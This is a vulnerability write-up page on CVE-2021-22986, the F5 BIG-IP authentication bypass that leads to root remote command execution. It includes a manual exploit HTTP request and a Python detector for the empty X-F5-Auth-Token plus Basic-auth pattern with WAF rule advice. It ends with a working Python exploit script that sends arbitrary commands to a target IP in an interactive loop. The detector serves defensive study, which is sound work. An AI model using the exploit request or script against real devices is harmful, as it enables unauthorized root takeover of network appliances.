BIG-IP RCE CVE-2021-22986

Vulnerability Info · Cyber Security · 2023-09-08 · 2044 views

Principle

When HTTP Basic authentication is sent together with an X-F5-Auth-Token header whose value is empty, the program's identity check is bypassed, and remote command execution is then possible through a specific API endpoint.

Affected Scope

Impact

Root privileges can be obtained and commands executed as root.

POC & EXP

Manual

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.59.7
Content-Type: application/json
X-F5-Auth-Token: 
Authorization: Basic YWRtaW46
Content-Length: 52

{
    "command": "run",
    "utilCmdArgs": "-c id"
}
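The manual request above shows exactly what a defender should look for on the wire: an iControl REST request under /mgmt/ that carries Basic credentials together with a present-but-empty X-F5-Auth-Token header. The following detector is an added example written for this post, not code from the original author or from F5. It assumes raw HTTP/1.x request text as a reverse proxy, WAF or packet capture would hand it over; the sample requests, hostname and token value are constructed for illustration.

```python
import json
from dataclasses import dataclass
from typing import Optional

# Constructed sample traffic (not real captures): three raw HTTP requests
# in the form a proxy, WAF or packet capture might pass to a detector.
SAMPLE_REQUESTS = [
    # 1. Matches the bypass pattern from the write-up: Basic auth plus an
    #    EMPTY X-F5-Auth-Token header against the bash utility endpoint.
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Content-Type: application/json\r\n"
    "X-F5-Auth-Token: \r\n"
    "Authorization: Basic YWRtaW46\r\n"
    "\r\n"
    '{"command": "run", "utilCmdArgs": "-c id"}',
    # 2. Ordinary token-based API call: non-empty token, no Basic auth.
    "GET /mgmt/tm/ltm/virtual HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "X-F5-Auth-Token: 0123456789ABCDEF0123456789ABCDEF\r\n"
    "\r\n",
    # 3. Basic auth alone, with no X-F5-Auth-Token header at all.
    "GET /mgmt/tm/sys/version HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Authorization: Basic YWRtaW46\r\n"
    "\r\n",
]


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased, values stripped
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def is_auth_bypass_attempt(req: HttpRequest) -> bool:
    """True when the request carries the header combination the bypass relies on.

    Both conditions from the write-up must hold: HTTP Basic credentials are
    present AND an X-F5-Auth-Token header is present but empty. Only the
    iControl REST tree (/mgmt/) is of interest.
    """
    if not req.path.startswith("/mgmt/"):
        return False
    if "x-f5-auth-token" not in req.headers:
        return False
    if req.headers["x-f5-auth-token"] != "":
        return False
    return req.headers.get("authorization", "").lower().startswith("basic ")


def command_from_body(req: HttpRequest) -> Optional[str]:
    """For /mgmt/tm/util/bash, pull the shell argument string into the alert."""
    if req.path != "/mgmt/tm/util/bash":
        return None
    try:
        return json.loads(req.body).get("utilCmdArgs")
    except (json.JSONDecodeError, AttributeError):
        return None


def scan(raw_requests):
    """Return one alert dict per request matching the bypass pattern."""
    alerts = []
    for raw in raw_requests:
        req = parse_request(raw)
        if is_auth_bypass_attempt(req):
            alerts.append({
                "path": req.path,
                "host": req.headers.get("host", ""),
                "util_cmd_args": command_from_body(req),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print("ALERT CVE-2021-22986 bypass pattern:", alert)
```

Only the first sample triggers an alert; a normal token session and a plain Basic-auth call are left alone, because the write-up's bypass needs both headers at once. In production the same predicate maps directly onto a WAF or proxy rule: deny or log any /mgmt/ request whose X-F5-Auth-Token header is present and empty while an Authorization: Basic header is also present, and treat /mgmt/tm/util/bash in particular as a high-severity hit.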

Script

import requests
import json
import sys

# Suppress the InsecureRequestWarning raised by verify=False below.
requests.packages.urllib3.disable_warnings()
# Traffic is routed through a local HTTP proxy on port 7890 for inspection;
# set proxies = None to send requests directly.
proxies = {'http': 'http://localhost:7890', 'https': 'http://localhost:7890'}

# BIG IP CVE-2021-22986
def POC(ip, cmd):
    url = "https://" + ip + "/mgmt/tm/util/bash"
    # Basic credentials plus an empty X-F5-Auth-Token header trigger the auth bypass.
    headers = {
        "Authorization": "Basic YWRtaW46QVNhc1M=",
        "X-F5-Auth-Token": "",
        "Content-Type": "application/json"
    }
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        resp = requests.post(url=url, json=data, headers=headers, verify=False, timeout=20, proxies=proxies)
        # A vulnerable target answers HTTP 200 with the command output in "commandResult".
        if resp.status_code == 200 and 'commandResult' in resp.text:
            source = json.loads(resp.text)
            print(source['commandResult'])
            return True
        else:
            print("Code: " + str(resp.status_code))
            return False
    except Exception as e:
        print("Error: " + str(e))
        return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <ip>")
        sys.exit(1)
    ip = sys.argv[1]
    if POC(ip, "whoami"):
        while True:
            POC(ip, input("Command: "))
    else:
        print("commandResult not Found.")

Tags: Unauthenticated Access · Remote Command Execution · RCE · 2021